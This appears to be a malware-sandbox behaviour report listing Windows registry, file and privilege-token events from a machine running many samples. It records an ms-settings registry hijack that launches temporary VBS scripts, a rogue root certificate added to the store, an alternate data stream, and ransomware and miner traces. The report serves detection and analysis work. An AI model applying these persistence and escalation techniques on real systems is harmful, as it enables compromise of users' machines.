Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = a4195e346540db01 C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Desktop\Files\System.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\8504.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\HELPDIR C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Version\ = "6.0" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\MiscStatus\1 C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\ C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4284.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0 C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0\win32 C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ = "C:\\PROGRA~2\\MOUNTT~1\\Lodop\\CAOSOF~1.OCX" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Lodop.LodopX C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\System32\WScript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ = "ILodopX" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID\ = "Lodop.LodopX" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\MountTaiSoftware\\Lodop\\CAOSOFT_WEB_PRINT_lodop.ocx,0" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\1998.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\FLAGS\ = "2" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED} C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32 C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E} C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0 C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib\Version = "6.0" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA} C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\0\ = "Properties,0,2" C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Desktop\Files\frap.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB} C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\Desktop\Files\windowsexecutable.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\Desktop\Files\windowsexecutable.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\IMG001.exe\:P:$DATA C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A
File created C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\built.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
